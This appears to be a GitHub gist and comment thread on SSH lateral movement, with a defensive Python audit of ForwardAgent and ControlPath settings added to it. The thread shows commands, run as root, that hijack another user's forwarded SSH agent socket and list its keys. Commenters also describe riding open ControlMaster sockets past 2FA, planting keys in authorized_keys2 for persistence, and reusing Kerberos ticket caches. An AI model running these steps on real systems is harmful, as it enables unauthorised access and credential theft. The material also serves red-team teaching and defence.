Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld

This post explains it well and details the safer ssh -J alternative.

@wvu-r7 wvu-r7 commented Jan 7, 2021

👋 ❤️

Adding to this, ssh-add(1) can be used to list/manage identities. :)

root@[redacted]:~# SSH_AUTH_SOCK="/tmp/ssh-[redacted]/agent.[redacted]" ssh-add -l
256 SHA256:[redacted] [redacted].key (ED25519)
root@[redacted]:~#

The above example lists the fingerprints and private key filenames for a particular agent.

This technique works on both local and forwarded agents!

@int0x80 int0x80 commented Jan 7, 2021

Fantastic recon technique! Thank you for the additional knowledge @wvu-r7 ❤️

@wvu-r7 wvu-r7 commented Jan 7, 2021

Likewise! Thank you for sharing.

@0xdade 0xdade commented Jan 7, 2021

Slightly tangential, but related to abusing ssh configurations for lateral movement:

Look for ControlMaster auto and ControlPath in ssh config files. You can use the ControlPath to find control sockets that are currently open to remote servers, then ssh to that same remote server, usually without having to reauthenticate or go through 2FA.

The downside to this is that you're multiplexed using the first connection, so if the first connection gets terminated then your connection also goes down. So maybe have something handy to be ready to drop backup keys (~/.ssh/authorized_keys2 is often still a valid keys file and not usually clobbered by host configuration tools like chef/puppet/salt/etc) or otherwise establish persistence once you ride along.

@wvu-r7 wvu-r7 commented Jan 7, 2021

That's also a great one, @0xdade! Thanks for the share. I guess while we're at it, haha...

Kerberos authentication can also be leveraged for lateral movement, often with SSH. The KRB5CCNAME environment variable can be set to the path of a user's credentials (ticket) cache, usually in /tmp. klist(1) can be used to view the cache.

@int0x80 int0x80 commented Jan 7, 2021

@0xdade great add! I may have run into those in a former life 😉 Sometimes I have to remember to check /etc/ssh/ssh_config in addition to the home directory ~/.ssh/config files.

@wvu-r7 holy smokes, TIL! Can't wait to hit a Windows machine with this.
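An added example, not from the gist or any of the commenters: a small Python audit of the client config files mentioned above (~/.ssh/config and /etc/ssh/ssh_config) that resolves ForwardAgent, ControlMaster and ControlPath for a destination the way ssh(1) does, where the first value obtained for a keyword wins, so a per-host `ForwardAgent no` placed below a global `ForwardAgent yes` is silently ignored. The sample config is constructed; Host patterns are approximated with fnmatch, and Match blocks and negated patterns are not handled.

```python
import fnmatch
import shlex

# Constructed sample ~/.ssh/config. Note the ordering: the global
# ForwardAgent yes appears before the per-host ForwardAgent no.
SAMPLE_CONFIG = """
ForwardAgent yes
ControlMaster auto
ControlPath ~/.ssh/cm-%r@%h:%p
Host internal.company.tld
    ProxyJump bastion
    ForwardAgent no
Host *.lab
    ControlMaster no
"""

def parse_ssh_config(text):
    # (host_patterns, {keyword: value}) blocks in file order; options before
    # the first Host line live in an implicit block that matches every host.
    blocks = [(["*"], {})]
    for raw in text.splitlines():
        parts = shlex.split(raw.split("#", 1)[0])
        if not parts:
            continue
        if parts[0].lower() == "host":
            blocks.append((parts[1:], {}))
        else:
            blocks[-1][1][parts[0].lower()] = " ".join(parts[1:])
    return blocks

def effective_options(blocks, host):
    # ssh(1) keeps the FIRST value obtained for each keyword, so a Host block
    # lower in the file cannot override a global set near the top.
    opts = {}
    for patterns, kv in blocks:
        if any(fnmatch.fnmatchcase(host, p) for p in patterns):
            for key, value in kv.items():
                opts.setdefault(key, value)
    return opts

def audit(blocks, host):
    # Flag what the thread abuses: a forwarded agent socket and an on-disk
    # ControlMaster socket (ControlMaster only multiplexes with a ControlPath).
    o = effective_options(blocks, host)
    mux = o.get("controlmaster", "no").lower() in ("yes", "auto", "ask", "autoask")
    return {
        "forward_agent": o.get("forwardagent", "no").lower() == "yes",
        "control_socket": mux and o.get("controlpath", "none").lower() != "none",
        "proxy_jump": o.get("proxyjump"),
    }
```

Run `audit(parse_ssh_config(open(path).read()), "internal.company.tld")` against a real file to see that the sample's per-host `ForwardAgent no` never takes effect; the fix is to put host-specific blocks first and the defaults in a trailing `Host *` block.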

@wvu-r7 wvu-r7 commented Jan 7, 2021

Both ssh -L and -R can forward Unix sockets, too. Might be useful when performing SSH gymnastics.

@dandare100 dandare100 commented Jan 7, 2021

Thank you, this is cool stuff.
There are quite a few operations defined in the agent-forwarding spec.

A particularly interesting one is using the agent to perform private key signing operations, without having access to the key itself.

Here is a simple POC that shows this in action

https://github.com/dandare100/agentstub

@wvu-r7 wvu-r7 commented Jan 7, 2021

Wish I could react to gist comments. Thanks for the contribution!

@int0x80 int0x80 commented Jan 9, 2021

@dandare100 TIL! Thank you for sharing that.

@dandare100 dandare100 commented Jan 10, 2021

cool runnings
